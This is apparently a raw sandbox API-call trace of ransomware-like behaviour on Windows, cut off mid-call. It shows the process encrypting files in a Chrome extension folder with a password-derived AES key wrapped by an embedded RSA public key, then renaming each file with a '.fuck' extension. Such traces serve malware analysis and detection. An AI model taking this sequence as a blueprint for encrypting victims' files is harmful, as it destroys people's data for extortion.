(lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), bFailIfExists=0) returned 1 [0247.635] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", dwFileAttributes=0x0) returned 1 [0247.635] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.gsg")) returned 1 [0247.637] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.fuck")) returned 1 [0247.638] CryptDestroyHash (hHash=0x29385f8) returned 1 [0247.638] CryptDestroyKey (hKey=0x29387f8) returned 1 [0247.638] CryptReleaseContext (hProv=0x293a510, dwFlags=0x0) returned 1 [0247.638] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0247.638] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0247.638] GetLastError () returned 0x0 [0247.638] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js")) returned 0x20 [0247.638] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", dwFileAttributes=0x80) returned 1 [0247.639] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0247.639] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.640] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.gsg", dwFileAttributes=0x2) returned 1 [0247.640] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2939f38) returned 1 [0247.643] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0247.643] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0247.643] CryptHashData (hHash=0x29385f8, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.643] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29385f8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2938a38) returned 1 [0247.644] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.644] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0247.644] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x293abf8) returned 1 [0247.644] CryptImportPublicKeyInfo (in: hCryptProv=0x293abf8, dwCertEncodingType=0x1, pInfo=0x2936070*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29360a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29360a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2938a78) returned 1 [0247.644] CryptEncrypt (in: hKey=0x2938a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0247.644] CryptEncrypt (in: hKey=0x2938a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293a7b8*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x293a7b8*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0247.645] WriteFile (in: hFile=0x5d50, lpBuffer=0x293a7b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x293a7b8*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0247.646] ReadFile (in: hFile=0x5d54, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x5f, lpOverlapped=0x0) returned 1 [0247.648] CryptEncrypt (in: hKey=0x2938a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x5f, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x60) returned 1 [0247.648] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x60, lpOverlapped=0x0) returned 1 [0247.648] CloseHandle (hObject=0x5d54) returned 1 [0247.648] CloseHandle (hObject=0x5d50) returned 1 [0247.652] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), bFailIfExists=0) returned 1 [0247.656] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", dwFileAttributes=0x0) returned 1 [0247.657] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.gsg")) returned 1 [0247.658] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.fuck")) returned 1 [0247.659] CryptDestroyHash (hHash=0x29385f8) returned 1 [0247.659] CryptDestroyKey (hKey=0x2938a38) returned 1 [0247.659] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0247.659] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0247.659] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0247.660] GetLastError () returned 0x0 [0247.660] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json")) returned 0x20 [0247.660] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", dwFileAttributes=0x80) returned 1 [0247.660] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.661] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0247.661] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.gsg", dwFileAttributes=0x2) returned 1 [0247.662] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2939da0) returned 1 [0247.665] CryptCreateHash (in: hProv=0x2939da0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0247.665] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0247.665] CryptHashData (hHash=0x2938af8, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.665] CryptDeriveKey (in: hProv=0x2939da0, Algid=0x6610, hBaseData=0x2938af8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2938678) returned 1 [0247.665] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.665] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0247.665] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x293a6a8) returned 1 [0247.665] CryptImportPublicKeyInfo (in: hCryptProv=0x293a6a8, dwCertEncodingType=0x1, pInfo=0x2936140*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2936170*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2936178*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2938778) returned 1 [0247.665] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0247.666] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293a9d8*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x293a9d8*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0247.666] WriteFile (in: hFile=0x5d54, lpBuffer=0x293a9d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x293a9d8*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0247.667] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x2d5, lpOverlapped=0x0) returned 1 [0247.678] CryptEncrypt (in: hKey=0x2938678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2d5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2e0) returned 1 [0247.678] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x2e0, lpOverlapped=0x0) returned 1 [0247.682] CloseHandle (hObject=0x5d50) returned 1 [0247.682] CloseHandle (hObject=0x5d54) returned 1 [0247.686] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), bFailIfExists=0) returned 1 [0247.690] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", dwFileAttributes=0x0) returned 1 [0247.690] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.gsg")) returned 1 [0247.692] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.fuck")) returned 1 [0247.693] CryptDestroyHash (hHash=0x2938af8) returned 1 [0247.693] CryptDestroyKey (hKey=0x2938678) returned 1 [0247.693] CryptReleaseContext (hProv=0x2939da0, dwFlags=0x0) returned 1 [0247.693] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0247.693] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x29387b8 [0247.705] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.705] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.705] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29385f8 [0247.706] FindNextFileA (in: hFindFile=0x29385f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.706] FindNextFileA (in: hFindFile=0x29385f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.706] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.706] GetLastError () returned 0x0 [0247.706] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json")) returned 0x20 [0247.706] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", dwFileAttributes=0x80) returned 1 [0247.707] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.707] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.708] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0247.708] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293a510) returned 1 [0247.711] CryptCreateHash (in: hProv=0x293a510, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0247.711] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0247.711] CryptHashData (hHash=0x29387f8, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.711] CryptDeriveKey (in: hProv=0x293a510, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938ab8) returned 1 [0247.711] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.711] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0247.711] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2939d18) returned 1 [0247.712] CryptImportPublicKeyInfo (in: hCryptProv=0x2939d18, dwCertEncodingType=0x1, pInfo=0x292f1f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292f220*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292f228*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29388f8) returned 1 [0247.712] CryptEncrypt (in: hKey=0x29388f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0247.712] CryptEncrypt (in: hKey=0x29388f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293a620*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293a620*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0247.712] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293a620*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293a620*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0247.713] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x101, lpOverlapped=0x0) returned 1 [0247.714] CryptEncrypt (in: hKey=0x2938ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x101, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0247.714] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, 